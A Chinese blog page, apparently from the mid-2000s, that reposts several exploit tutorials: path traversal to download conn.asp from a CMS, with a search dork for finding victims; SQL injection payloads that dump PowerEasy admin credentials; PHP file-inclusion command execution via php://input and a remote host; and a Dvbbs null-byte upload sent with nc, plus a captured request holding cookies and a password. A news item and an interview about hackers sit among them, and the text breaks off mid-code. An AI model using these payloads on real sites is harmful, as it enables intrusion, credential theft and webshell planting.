Chinadu's Blog

信息来源：至尊宝的成长之路 FireFox's blog

flash/downfile.asp过滤不严导致可下载任意文件。

<%
Dim url,strUrl,strPath
url = Replace(Replace(Replace(Request("url"), "'", ""), "%", ""), "\", "/")
//首先先进行一些字符的替换，'换成空，%也换成空，\换成/

If Len(url) > 3 Then
 If Left(url,1) = "/" Then
 Response.Redirect url //如果用户提交的url第一个字符是/，那直接转向url
 End If
 If Left(url,3) = "../" Then
 Response.Redirect url //同上，意思就是不给你用../跳转目录
 End If
 strUrl = Left(url,10)
 If InStr(strUrl, "://") > 0 Then //这个，汗·～～://不懂干什么用的
 Response.Redirect url
 End If
 If InStr(url, "/") > 0 Then
 strPath = Server.MapPath(".") & "\" & url //补充物理地址了
 strPath = Replace(strPath, "/", "\") //替换/为\呢
 Call downThisFile(strPath) //HOHO～～开始下载了
 Else
 Response.Redirect url
 End If
End If

Sub downThisFile(thePath)
 Response.Clear
 On Error Resume Next
 Dim stream, fileName, fileContentType
 
 fileName = split(thePath,"\")(UBound(split(thePath,"\")))
 Set stream = Server.CreateObject("adodb.stream")
 stream.Open
 stream.Type = 1
 stream.LoadFromFile(thePath)
 Response.AddHeader "Content-Disposition", "attachment; filename=" & fileName
 Response.AddHeader "Content-Length", stream.Size
 Response.Charset = "UTF-8"
 Response.ContentType = "application/octet-stream"
 Response.BinaryWrite stream.Read
 Response.Flush
 stream.Close
 Set stream = Nothing
End Sub
%>


似乎是url都处理掉了，是不可能用../跳转目录的。但是，他判断../很奇怪，就判断url的前三个字符而已。所以，嘿嘿！前三个字符不能是../，难道我后面不能是吗？于是构造一下url参数为"uploadfile/../../conn.asp"，于是总体的地址就是http://127.0.0.1/flash/downfile.asp?url=uploadfile/../../conn.asp 。嘿嘿～～conn.asp文件下载下来了吧。
这套整站程序用的人还是挺多的，我甚至看到有两个黑客类的网站使用它。但是不约而同的是这个漏洞都存在。可以说，这个漏洞是通杀现在网上所有使用新云的系统的，连10.18出来的sp1都没补上。但是，很多大站都是使用sql版本的，而且主机又屏蔽了1433端口，于是，利用就成了问题。对于access 的系统，只要后台没改名，而且md5密码可以通过www.cmd5.com来查询，后台又有着数据库备份的功能，获得webshell是不成问题的。

ACCESS和SQL版通吃。
Google搜索关键字 "关于本站 - 网站帮助 - 广告合作 - 下载声明 - 友情连接 - 网站地图 - 管理登录"
把flash/downfile.asp?url=uploadfile/../../conn.asp提交到网站根目录。就可以下载conn.asp，以源码，软件等下载站居多。

网络安全研究人员周一警告称,IE7上存在的一个漏洞有可能允许恶意攻击者篡改一个合法网站上的弹出窗口里面的内容.
据ZDNet网站报道,那些访问一个受新任网站并打开了该网站上包含恶意代码的弹出式窗口的用户可能成为这个漏洞的受害者.这已是微软IE7发布2周以来发现的第二个安全漏洞.上周,人们在IE7上发现了一个可能在弹出窗口里显示诱骗性地址栏的漏洞.

据安全公司Secunia的首席技术官Thomas Kristensen称,如果IE7的这两个漏洞被结合在一起利用的话,除了哪些对安全问题时刻都保持警惕的用户外,所有的用户都会轻易上当受骗.

Secunia将最新发现的这一漏洞评定为“中度危险”,因为浏览这些内容不不会导致攻击者侵入用户的电脑,但如果用户在含有恶意代码的弹出窗口输入了敏感信息,如信用卡资料、用户名或密码等,就有可能成为受害者.此外,该漏洞评定为“中度危险”还因为它需要用户的参与,而且只影响到特定的受信任网站.

Secunia指出,该安全缺陷影响到运行IE7和Windows XP SP2的补丁齐全的系统.这家安全公司建议用户在浏览受信任网站的同时避免打开可疑的网站.

漏洞发现：某牛人
漏洞文件：NewComment.asp
补丁下载：http://bbs.powereasy.net/dispbbs.asp?boardID=67&ID=280136&page=1

影响版本： 所有版本（包括免费版、商业SQL版及Access版）

爆管理员密码：

ChannelID=1; ModuleName=Article+A+on+C%2EInfoID%3DA% 2EArticleID+where+A%2EChannelID%3D1+and+1%3D1++And+%28Select+Top+1+char%28124%29%2BisNull%28cast%28%5Busername%5D+as+varchar%288000%29%29%2Cchar%2832%29%29%2Bchar%28124%29%2BisNull%28cast%28%5Bpassword%5D+as+varchar%288000%29%29%2Cchar%2832%29%29%2Bchar%28124%29+From+%28Select+Top+1%5Busername%5D%2C%5Bpassword%5D+From+%5Bpe%5Fadmin%5D+Where+1%3D1+Order+by+%5Busername%5D%2C%5Bpassword%5D%29+T+Order+by+%5Busername%5D+desc%2C%5Bpassword%5D+desc%29%3E0%2d%2d

在NewComment.asp文件中


ModuleName = Trim(request("ModuleName"))

这个ModuleName变量没过滤好，从而导致，我们可以在下面的SQL语句中构造我们的
SQL语句


If ModuleName <> "" Then
    If ChannelID <> 0 Then
        If ClassID <> 0 Then
            sqlComment = "Select top " & Num & " C.* from PE_Comment C left join PE_" & ModuleName & " A on C.InfoID=A." & ModuleName & "ID where A.ChannelID= " & ChannelID & " and A.ClassID= " & ClassID & " and C.Passed =" & PE_True

sqlComment = "Select top " & Num & " C.* from PE_Comment C left join PE_" & Article+A+on+C.InfoID=A.ArticleID+where+A.ChannelID=1+and+1=1


在A.ChannelID=1后就可以构造我们的SQL语句。（其中空格用+来代替。）


NewComment.asp?num=1&ChannelID=1&ClassID=1&ModuleName=Article+A+on+C.InfoID=A.ArticleID+where+A.ChannelID=1%20and%20user>0--

例如这样就可以暴mssql用户名

剩下的就是sql注入老

< *来源：Secunia

链接：http://secunia.com/advisories/22542/
*>

测试方法：

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
http://secunia.com/internet_explorer_7_popup_address_bar_spoofing_test/

建议：厂商补丁：

Microsoft
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.microsoft.com/windows/ie/default.asp

作者: 疯狗
经常听到PHP文件包含漏洞,前一阵子贱心发现的BO-BLOG漏洞就是文件包含漏洞,可以用来执行一些命令,这个文件包含到底是怎样形成鸟?

可以简单的理解为乱用include();

$id=$_GET["id"];
include($id);

稀里糊涂的就把$id这个变量给引用了,但是不要单纯的理解为这个漏洞就是include了变量,include了文件也是有可能利用的,这个稍后在做介绍.

首先做个简单的测试,让大家初步了解下文件包含BUG(提交数据,我爱curl),首先把以上文件保存在肉鸡上,我命名为1.php

然后提交我们构造的$id变量内容,/etc/passwd,提交,看返回结果

C:>F:Hacker综合工具curlcurl.exe http://www.***.net/admin/1.php -d "id=/etc/passwd"
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/bin/bash
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
sheke:x:500:500::/usr/:/bin/bash
mysql:x:501:501::/home/mysql:/bin/bash
my89189-com:x:502:503::/home/web/my89189-com/:/sbin/nologin
sk:x:503:504::/home/sk:/bin/bash
cyol-com:x:504:505::/home/web/cyol-com/:/bin/bash
ianlow-com:x:505:506::/home/web/ianlow-com/:/bin/bash
rich30:x:506:507::/home/web/rich30:/bin/bash
sanyc:x:507:508::/home/web/sanyc/:/bin/bash
toipo-com:x:508:509::/home/web/toipo-com/:/bin/bash
my89189-com-minglu:x:509:510::/home/web/my89189-com/minglu/:/bin/bash
dong:x:510:511::/home/web/my89189-com/minglu/dong/:/bin/bash
jeslea-com:x:511:512::/home/web/jeslea-com:/bin/bash

C:>

读出文件了哦,注意权限,如果我提交一个不存在的变量是什么效果呢?

C:\>F:\Hacker\综合工具\curl\curl.exe http://www.***.net/admin/1.php -d "id
=fuck"

Warning: main(fuck): failed to open stream: No such file or directory in
/home/web/sa***/admin/1.php on line 2

Warning: main(fuck): failed to open stream: No such file or directory in
/home/web/sa***/admin/1.php on line 2

Warning: main(): Failed opening 'fuck' for inclusion (include_path='.:/u
sr/local/php/lib/php') in /home/web/sa***/admin/1.php on line 2
/>

C:\>

爆出了绝对路径,MLAND有事,就先写到这.

光是这样来读取文件觉得还不够,是否可以执行命令呢?有种方法是把< ?passthru($cmd);?>写进apache的日志文件,但是成功率不高,在网上找到一种方法,利用php://input
URL:http://www.itvisual.org/linux/18/112408.html

来提交
C:\>F:\Hacker\综合工具\curl\curl.exe http://www.***.net/admin/1.php -d "id
=php://input&< ?passthru('id');?>"
id=php://input&uid=99(nobody) gid=4294967295 groups=4294967295

呵呵,成功了,试试列目录,替换W为ls即可,文件包含漏洞配合这个php://input简直了,而且它默认还是开放的,好了下面试试非变量包含漏洞,即"文件"包含漏洞是怎样的呢?

例如2.php是这样的
< ?
...
include("$inc/conn.php")
...
?>

虽然$inc我们可以自己来定义,但是后面还有个conn.php,难道这样就不行了吗?首先我们可以定义$inc,还有呢,别忘了这是include啊!我们完全可以利用第三人来配合攻击.也许有的人糊涂了,或者是思路被限制了,认为$inc只能提交些命令,其实我们完全可以把它伪装成另一个站点,那么调用的就是另一个站点的conn.php了,而这个conn.php呢,内容就是这个

< ?passthru($cmd);?>

然后在提交$cmd变量的内容为我们需要的命令,貌似很烦琐啊,看这个例子大家就明白了

C:\>F:\Hacker\综合工具\curl\curl.exe http://www.***.net/admin/2.php -d "in
c=http://www.loveshell.net&cmd=id"
uid=99(nobody) gid=4294967295 groups=4294967295

看到了吗?其实引用的内容变成include("http://www.loveshell.net/conn.php")了,紧接着$cmd变量跟入执行命令.

由此可见,这钟漏洞危害很大啊,ls出数据库连接文件,在cat,结果可想而知,而且现在不知道还有多少程序存在隐藏的文件包含BUG,当然了,现在大的程序的include()绝不会这么弱智的,一定会有对变量处理的地方,但是也会有疏漏的,好自为之了.

今天BCT把动易SP4的漏洞公布了，既然都公布了，那么还是发出来吧！

在NewComment.asp文件中

ModuleName = Trim(request("ModuleName"))

这个ModuleName变量没过滤好，从而导致，我们可以在下面的SQL语句中构造我们的
SQL语句


If ModuleName <> "" Then
    If ChannelID <> 0 Then
        If ClassID <> 0 Then
            sqlComment = "Select top " & Num & " C.* from PE_Comment C left join PE_" & ModuleName & " A on C.InfoID=A." & ModuleName & "ID where A.ChannelID= " & ChannelID & " and A.ClassID= " & ClassID & " and C.Passed =" & PE_True

sqlComment = "Select top " & Num & " C.* from PE_Comment C left join PE_" & Article+A+on+C.InfoID=A.ArticleID+where+A.ChannelID=1+and+1=1


在A.ChannelID=1后就可以构造我们的SQL语句。（其中空格用+来代替。）


NewComment.asp?num=1&ChannelID=1&ClassID=1&ModuleName=Article+A+on+C.InfoID=A.ArticleID+where+A.ChannelID=1%20and%20user>0--

例如这样就可以暴mssql用户名

省下的就是sql注入老

1 传漏洞利用的原理只是针对form格式上传的asp和php脚本***
nc(netcat)

用于提交数据包

dos界面下运行:

nc -vv www.***.com 80<1.txt

-vv: 回显

80: www端口

1.txt: 就是你要发送的数据包 (更多使用方法请查看本区的帖子)

wse(wsockexpert) 对本机端口的监视,抓取ie提交的数据包

2 漏洞原理

下面例子假设的前提

www主机: www.***.com;

bbs路径 : /bbs/

漏洞源于对动网上传文件的研究,建议有一定编程经验的看看dvbbs的upfile.asp文件,没有必要全部看懂。upfile是通过生成一个form表上传,如下


<form name="form" method="post" action="upfile.asp" ...>

<input type="hidden" name="filepath" value="uploadface">

<input type="hidden" name="act" value="upload">

<input type="file" name="file1">

<input type="hidden" name="fname">

<input type="submit" name="submit" value="上传" ...></form>


用到的变量:：

filepath 默认值uploadface 属性hiden

act 默认值upload 属性hiden

file1 就是你要传的那个文件

关键是 filepath 这个变量!

默认情况下我们的文件上传到www.***.com/bbs/uploadface/

文件是用你的上传时间命名的,就是upfile里的这一句


filename=formpath&year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&rannum&"."&fileext


--------------------------------------

我们知道计算机里面的数据是一""为标致的用过c语言的都知道：char data[]="bbs" 这个data数组长度是4: b b s

如果我们构造filepath如下,会怎么样呢?

filepath="/newmm.asp"

我们在2004.09.24.08.24传的文件就会发生变化没有改时:： _blank>http://www.***.com/bbs/uploadface/200409240824.jpg 用我们构造的filepath时：_blank>http://www.***.com/newmm.asp/200409240824.jpg

这样当服务器接收filepath数据时,检测到newmm.asp后面的就理解为filepath的数据就结束了。这样我们上传的文件,比如c:.asp 就保存成: _blank>http://www.***.com/newmm.asp

3 后期补充

漏洞公布以后很多网站做了相应的处理,但是对于filepath的过滤和处理都不行。有很多网站只是加了n个hiden属性的变量对付网上公布的 upfile.exe就是那个上传漏洞利用工具或者filepath变量利用工具(老兵的)...但是最基本的没改啊。而且很对网站的插件里有类似的漏洞,我要说的不要依赖哪些专门的工具。自己改wse抓到的包里的filepath变量,然后在用nc提交。就算他加n个hiden变量也于事无补。当然, 如果对filepath做了很严格的过滤的话我们的这些理论就将宣告终结就是我们的新理论诞生的时候!

4 详细实例

一、wse抓包结果(存到1.txt里)：

post /bbs/upphoto/upfile.asp http/1.1

accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,

application/x-shockwave-flash, application/vnd.ms-excel,

application/vnd.ms-powerpoint, application/msword, */*

referer: _blank>http://www.xin126.com/bbs/upphoto/upload.asp

accept-language: zh-cn

content-type: multipart/form-data;

boundary=-----------7d423a138d0278

accept-encoding: gzip, deflate

user-agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr 1.1.4322)

host: _blank>www.xin126.com

content-length: 1969

connection: keep-alive

cache-control: no-cache

cookie: aspsessionidaccccdcs=njhcphpalbcankobechkjanf;

iscome=1; gamvancookies=1; regtime=2004%2d9%2d24+3%3a39%3a37;

username=szjwwwww; pass=5211314; dl=0; userid=62;

ltstyle=0; logintry=1; userpass=eb03f6c72908fd84

-----------------------------7d423a138d0278

content-disposition: form-data; name="filepath"

../medias/myphoto/

-----------------------------7d423a138d0278

... ...

上传

---------------7d423a138d0278-----------------


二、ultraedit打开1.txt改数据：


......

-----------------------------7d423a138d0278

content-disposition: form-data; name="filepath"

/newmm.asp <===这个黑色代表一个空格是 0x20,改成0x00就可以了

......


三、重新计算cookies长度,然后nc提交

nc -vv _blank>www.xin126.com 80 <1.txt

ultraedit是一个16位编辑器网上可以下载得到

我们主要用来写那个结束标致: ====>16位表示:0x00或者00h

其实你改的时候就直接再filepath的结尾处加个00就ok了

计算cookies长度===>你把fillepath改了之后、肯定是或＋或—cookies的长度变了

----------------------------

......

host: _blank>www.xin126.com

content-length: 1969 <======就是这个

connection: keep-alive

cache-control: no-cache

......


计算会吧?一个字母、数字就是1

对于上传漏洞提出的解决思路：(仅供参考)

1、一般的上传是把上传路径作为一个变量来处理

===>我们的对策就是把filepath变成常量。。。

这个方法是目前最有效的(我认为的)

2、加强对于的处理,原来我们是读到这里就结束

我们继续读直道下一个变量开始的地方，处理就ok了

附：NC Usage:

监听外部主机

nc [-options] hostname port[s] [ports] ...

监听本地主机

nc -l -p port [options] [hostname] [port]

options:

-d detach from console, stealth mode

-e prog inbound program to exec [dangerous!!]

-g gateway source-routing hop point[s], up to 8

-g num source-routing pointer: 4, 8, 12, ...

-h this cruft

-i secs delay interval for lines sent, ports scanned

-l listen mode, for inbound connects

-l listen harder, re-listen on socket close

-n numeric-only ip addresses, no dns

-o file hex dump of traffic

-p port local port number

-r randomize local and remote ports

-s addr local source address

-t answer telnet negotiation

-u udp mode

-v verbose [use twice to be more verbose]

-w secs timeout for connects and final net reads

-z zero-i/o mode [used for scanning]

port numbers can be individual or ranges: m-n [inclusive]

互联网大会三天，新网、宝洁、反黑客官方网站相继被黑，再次把黑客推向前台。在黑客工具日益泛滥，黑客攻击频繁的被利用成为市场竞争手段的今天，黑客未来的走向越来越受到社会各界的强烈关注，顶尖黑客做客南方IT沙龙，网易科技为你独家解密。
[最新消息]
中国万网9月29日晚遭黑客大规模攻击

[近期黑客事件回顾]

宝洁中国网站被黑客攻破 留言要求SK-II滚出中国

域名服务商新网遭黑客攻击 约20%中国网站瘫痪

黑客公然叫嚣"黑客在此" 百度新网不是最后一个

百度遭史上最大规模黑客攻击 搜索报障30分钟

嘉宾：
谢朝霞 深圳安络科技副总裁
陈三堰 广州易城科技总经理
主持人：
网易财富中心总监：刘红鹰
网易科技：古丰

提醒：网友可以点击这里 到南方IT沙龙论坛与嘉宾互动和交流

比尔.盖茨也算得上黑客
古丰：最近黑客话题很火爆，在刚结束的2006中国互联网大会期间，三天内新网、宝洁、反黑论坛接连被黑了，为什么最近会出现这么多黑客行动呢？今天南方IT沙龙第六期非常荣幸请来了中国第一第二代的“黑客代表性人物”谢朝霞和陈三堰，当然了，黑客早年是爱国主义、网络高手的代名词，现在黑客往往被赋予更多负面的含义，今天两位嘉宾也早已经告别的所谓的黑客生涯，并在各自领域上有自己的成就，但相信两位对最近频频爆发的黑客事件有比较深刻的理解，我们先让两位简单介绍下自己。
谢朝霞：今天来广州首先感谢网易科技给我这个平台，我首先发表下声明，在中国，黑客这词已经被滥用，相信现在我已经可以作为为网络安全代表方来谈黑客这个话题。在2001年网络泡沫破裂后，一度出现很困难的情况，我们坚持下来把网络安全作为主营业务。现在困难已经过去，产业的前景不错。
刘红鹰：谢朝霞以前在江湖上的名号叫什么？
谢朝霞：老毒物是我早期聊天室的网名，后来传开了成为我的代号。
陈三堰：我来自第八军团，99年创办，感谢网易科技今天提供的机会。关于黑客，这个词已经被滥用了，我深有同感，现在也不想提到这个词语，一般人认为黑客是很神秘的人物，偷QQ，黑网站等，实际上真正的黑客不会这样做的。我的网名是陈三公子，99年华南理工大学毕业，之后做过老师，后来由于崇拜电脑报里的陈三公子，取这个名字也是因为崇拜，目前主要从事网络安全行业。
刘红鹰：很有个性的两位家宾，从你们的个人经历开始向我们的网友讲解下如何？
谢朝霞： 很有必要在开始讨论前，对黑客这个词做个定义和划分，HACKER本意是做一件漂亮事件的人。公认为互联网最早的HACKER是写操作系统的人，包括比尔.盖茨等人，他们是最早对互联网做出贡献的人，也能称得上黑客。目前黑客有三种类型是公认的，一是对网络有贡献的人，二是发现漏洞的人，三是利用攻击手段的人。白帽子是做兵器的，黑帽子是用兵器去杀人的。还有介于中间的灰帽子。网络安全公司里有很多曾经被称为黑客的人，他们不是金盆洗手，他们是把自己的技术应用在对社会有益的地方。他们是白帽子。还有发现漏洞，促使厂商发布补丁的也是正义的黑客。
陈三堰：对于谢朝霞对黑客的定义，我基本认同。刚才说的，黑客注重工具，这点实际上很多黑客也非常注意对于漏洞的研究及工具的制作,可能对于骇客来讲对于黑客工具的依赖会比较强.
刘红鹰：今天很有意思的细节是，二位被称为黑客，却都穿着白衣服，是不是有意告诉别人你们不是黑客？如果现在叫你们黑客，你们愿意么？
陈三堰：实际上我更欣赏的是黑客的学习态度及研究的精神.但是并不因此就可以称之为黑客,我们也是在经历一个学习的过程,别人认为我们是黑客,而自己感觉可能离心目中的黑客距离还很远,这与每个人心中对黑客的理解有关。

中国有500万黑客 攻击百度小孩也能做到
刘红鹰：在普通网友心目中，黑客更多的是攻击者，拿到数据的和黑帮等，可能这些人的行为会被认为在现实社会中的所不能表达的抗议的行为，在中国，这些情绪，生存的压抑，未来的走向，二位是不是可以描述下中国的黑客的发展历史经历了或正经历着什么变化？
陈三堰：中国的黑客出现在95年，那时才是真正意义上的黑客，后来可能又出现了为体现技术的黑客，最近居然出现了犯罪的黑帮，给你发邮件，恐吓你。社会的发展，导致黑客不再象以往那样单纯以技术为目的，而更多的是为了金钱来行动。当然也有最近的事件，是没有任何目的的趋势。黑客现在缺少正确的引导，网络上很多工具，普通人都可以学会相关教程，黑客工具如果被小孩子们学会，如果没有正确的引导，这部分群体就会走向极端。目前我们所看到的，基本都是小孩子们在玩游戏，黑掉网站，挂上自己的QQ，我们看来，这样的行为很搞笑
古丰：您觉得百度、新网是小孩子们能黑的吗？
陈三堰：有些小孩子们可以完成，有很多小孩子手上有很多肉鸡，他们利用很多“肉鸡”发起拒绝服务攻击。前几天反黑官方网站被黑，就是一个小孩子做的，他给我发过图片显示过他的成果,“拥有肉鸡近三千台”，他觉得很有成就感。
古丰：为什么会在2006中国互联网大会三天每天就有一个网站受到黑客攻击呢？会不会是一种有计划有预谋的集中攻击行为？
陈三堰： 新网被黑我不大清楚具体细节，关于为啥选择再大会期间发动密集的攻击行为，可能有人是为了故意制造新闻，这样才能广受关注。
谢朝霞：关于具体事实和情况我不大清楚。从我的经验来看，攻击每时刻都在发生，我觉得互联网大会期间巧合的可能性更大。
刘红鹰：您们被江湖中称为第一代第二代的黑客，你什么时候被称为黑客的，从你的经历来看，黑客会往什么方向发展？
谢朝霞：我不清楚谁给我封上南帝的封号，我唯一的特点可能是从事业内的人中年龄大点。从事安全行业，不可能不对攻击有所了解。我说过黑客分三种。只说白帽、灰帽、黑帽。白帽子黑客的发展将来更多的会在技术上和产品上提供价值。白帽子完全有能力去银行调动数据库，但这是违法的，用同样的能力不如把自己的公司做大。我相信网络安全这个行业会越来越重要，比如电子政务，网上银行，网络游戏，对于网络安全要求很大，因此白帽子的利润空间很大。目前来讲，全球具备攻击能力的人有2000万，按3％－5％比例来算，中国黑客数量也差不多有300-500万。
刘红鹰：一般的攻击手段很多，都有什么，怎么防范？
陈三堰一般设备上有，操作系统，还有第三方软件都有漏洞，或者服务器上放置的程序都有漏洞，都可以被攻击，一般常用的手段可能是拒绝服务，这个是缺陷，可修改为:网络设备漏洞，操作系统漏洞，还有第三方软件漏洞，或者服务器上放置的程序都有漏洞，都可以被攻击，一般常用的手段
可能是拒绝服务，这个是网络协议本身的缺陷。中国的网站很脆弱，目前包括电子政务方面，安全意识很差。而另一方面来说，一些黑客，会在发展遇到障碍的时候，会转行做其他。
有钱的企业最容易受到攻击
刘红鹰：继百度、新网之后，谁最可能成为下一个被攻击的目标？
谢朝霞：有钱的网站和有钱的公司。
刘红鹰：是原生态的人做的还是公司的人做的？
谢朝霞：按目前安全状况来说，因此攻击的成本会越来越高，目的性越来越强。将来从底层攻击的难度会加大，从应用层攻击的会更多，邮件，应用程序，脚本等等方面。面对应用，就要对应用进行研究。因此攻击的成本会很过，目的性更高。
古丰：百度被黑的成本多高？如果你是百度的CTO你会怎么应对？
谢朝霞：更准确说，百度事件是堵塞，这个成本并不是很大的。百度对一般的拒绝服务攻击应该可以化解的。他们有财力。我们安全服务中有这样的服务。如果我百度CTO，一我要加大对主机和安全的投入，二要做好应急措施。这样的攻击是消耗战，你有不同的预案，是可以防范的。对于黑帽子，肯定越来也越多，因为网络应用和空间越大，更多的利益会促使更多的黑帽子发起对商家、个人、组织去下手。
黑客攻击是行侠仗义还是利益驱动
刘红鹰：百度被黑的事情，大家都觉得是正义的表现，二位觉得中国的黑客这样的行为更多的是正义的行为还是经济上的目的？

陈三堰： 对百度的了解来说，从前段裁员说，很多人觉得是值得同情的，应该发泄，SK-II也是这样被黑，可能有些高手会表达这样的愤怒的心情。大部分来说，很多高手都有正义感的，但有些事情不是一般小黑客能做的。当然，也越来越多黑客不再象以往那样单纯以技术为目的，而更多的是为了金钱来行动。
谢朝霞： 我认为百度被攻击的事件，从目前法律定义来看，国际上是被定义为恐怖行为的，中国已经加入这个协定的，有义务要进行调查的。对于黑帽子，肯定越来也越多，因为网络应用和空间越大，更多的利益会促使更多的黑帽子发起对商家，个人，组织去下手。无论什么原因，去攻击一个网站，这个做法是不可取的，目前我国对攻击网站等黑客行为的查处和打击力度在加大，有攻击能力的其行为稍有不慎可能会成为公安部门的查处对象。如果被攻击方足够有钱，愿意花代价的话，即使拒绝服务攻击，也是甚至可以查出来的。
黑客攻击成为市场竞争手段
观众提问：前段时间各大网站被黑事件，我个人认为有炒作的原因。我所了解，很多做网站的人都被攻击的话，被攻击的流量很大，这样的攻击是机房控制呢还是肉鸡比较多呢？
谢朝霞： 您讲的这个情况，我们有过了解。这样的行为往往是网站经营者之间互相攻击的，办网站的人有很好的带宽，甚至会花钱去攻击他们的竞争对手。可能是有组织的，起因还是商业竞争。
观众：如果是竞争对手攻击，现在新浪、搜狐、网易三大门户也好，搜索巨头百度、google等竞争对手很多，他们应如何面对黑客威胁？
谢朝霞： 我的亲身经历，2000初，我正在融资，那天就有人攻击我，我正演示给投资商看的时候就被攻击，后来我恢复后，攻击持续了一个月后停止，由此，我认为只要被自己的防范做好，就可以了。攻击时间太长长，就容易被查出来。

陈三堰： 我们的防火墙每秒都被人检测入侵，我们不知道是谁，只能自己采取措施去防范，往往有时候攻击也就持续一个月就会停掉。有客户找我们，有损失的，但是对于拒绝服务方面还是办法很少。我们有句话是，只有绝对的不安全，没有绝对的安全。
黑客还会为爱国挺身而出吗？
观众提问：政府如果需要黑客们保家卫国，黑客还会不会像中美黑客大战那样站出来？
谢朝霞： 从我们公司来讲，我们只是做到培训，防范，分析，技术发现。我觉得做到这一点，已经足够了，我们提供了防范手段，告诉了客户用途和手段。个人来讲，我也只会做到培训。
陈三堰：个人来说，特殊时期，你年轻的时候，可能会做些，成年时，除非特别需要，可能会考虑协助。这个问题有些尖锐，私聊更合适。对于爱国情感，每个人都会有的。
谢朝霞： 我要补充，您的问题有猜测。据我了解，只要国家不打仗，就没有网络上的行为。所有的目前的行为，都是个人行为。和平时期，做攻击行为的法律我国与其他国家一样，是有规定的，不可能有组织的。一般的攻击都是个人行为。
网络安全太昂贵 中小企业怎么保护自己
观众提问：我对黑客没认识，没兴趣，但我有个问题，二位多在网络安全方面的公司，网络安全只给国家，给能出得起钱的企业做，但对我们小企业来说，成本太高了，二位你们经营的企业，你们的客户群是怎样定位，我们没有财力的公司，能提供给我们什么服务，给我们什么建议？
谢朝霞： 安全是要成本的，先问你，你能出多少钱？
观众提问：需要看我们付出安全的成本与我们不做安全付出的代价哪个高？你们的服务适合什么人群？
谢朝霞： 您愿不愿意投入您的成本的10-15%来做网络安全。
观众：初期不会，发展大了会，正如正版软件一样，开始不会，公司大了不得不用。
谢朝霞： 我们的服务里有为中小企业服务的，一个月不会超过几百块，基本上满足中小企业的安全需求。行业运营的平台，也差不多可以做的。服务有软件加重大事件上门服务，一般事件的电话支持。
刘红鹰：有一个安全成本的问题，到底一个企业要多少安全成本可以得到安全保障？
陈三堰：很多创业型企业需要考虑很多，公司小的时候，觉得安全成本过高不愿做，大了就不会选择我们这些较小规模的网络安全公司。国内有300多家安全企业走的高端路线，低端服务走的还是很少，可能跟利润少有关系。对于安全厂商，确实很不好做。
刘红鹰：中国安全产业的市场有多大？
陈三堰： 据CNNIC最新公布的调查数据，截止2008年，中国安全市场达105亿。
刘红鹰：转型做安全工作以后，你们现在活得好么？
谢朝霞：现在企业投入的都不一样，很多小企业很少甚至没有，而很多大企业的投入很大甚至浪费。但总体来说，安全市场我们追求的是IT市场5%-10%。
刘红鹰：有黑客放出话，国内几大网站一夜间会被黑掉，有可能吗？
陈三堰：如果说用比较高级拒绝服务来实现或许有可能，这会考虑到"黑"到一个什么样的度,而局部一个小程序，可能是会找到漏洞，但整体被黑掉，是很难的。整个互联网还是很脆弱的，美国科学家的一项研究表明，似乎无所不能的互联网，却有着"阿克琉斯之踵"，只要几个关键环节被破坏，整个互联网将在瞬间瘫痪。[阿克琉斯是希腊神话里的无敌英雄，可一旦被射中右脚后跟，就会訇然倒地，软弱无力。]新网这次就是一个典型案例。
谢朝霞： 网络应用和网络安全一定要投入成本，安全是可以得到很大保

一.注入漏洞

漏洞文件edit.asp admin_editly.asp searchresult.asp

edit.asp代码分析：

<%
  dim id
    id=request("id")
    set rs=server.createobject("adodb.recordset")
    sql="select * from [guest] where id="&id
rs.open sql,conn,1,3
if rs("sessionid")=session.sessionid then
%>


一个典型的sql注入漏洞，程序用request直接获取id的值，没有经过任何的过滤，但是注意一下程序利用的

是session验证，也就是说，只有登陆后台，才有权限来构造语句。

admin_editly.asp代码分析：


<%
dim guestcontent
dim id
id=request("id")
guestcontent=request("guestcontent")
    set rs=server.createobject("adodb.recordset")
    sql="select guestcontent,id,sh from [guest] where id="&id
       rs.open sql,conn,1,3
if guestcontent<>"" then
rs("guestcontent")=guestcontent
rs("sh")=false
        rs.update
rsclose()
connclose() 
response.redirect "manage.asp"
end if
%>


漏洞与edit.asp如出一辙。同样直接获取id的值，没有任何过滤。虽然这里没有session验证，但是此文件的

开始有这么一句就是说 先得通过chkmanage.asp的验证才有权限登

陆这个页面。

searchresult.asp代码分析：

搜索型注入，everyone可以写。不用任何验证，它便是我们今天的主要对象。


<%
dim keyword
keyword=trim(request("keyword"))
classid=request("classid")
set rs=server.createobject("adodb.recordset")
if classid="留言内容" then
sql="select * from guest where guestcontent like '%"&keyword&"%'"
elseif classid="回复内容" then
sql="select * from guest where guestreply like '%"&keyword&"%'"
else
sql="select * from guest where guestname like '%"&keyword&"%'"
end if
rs.open sql,conn,3,1
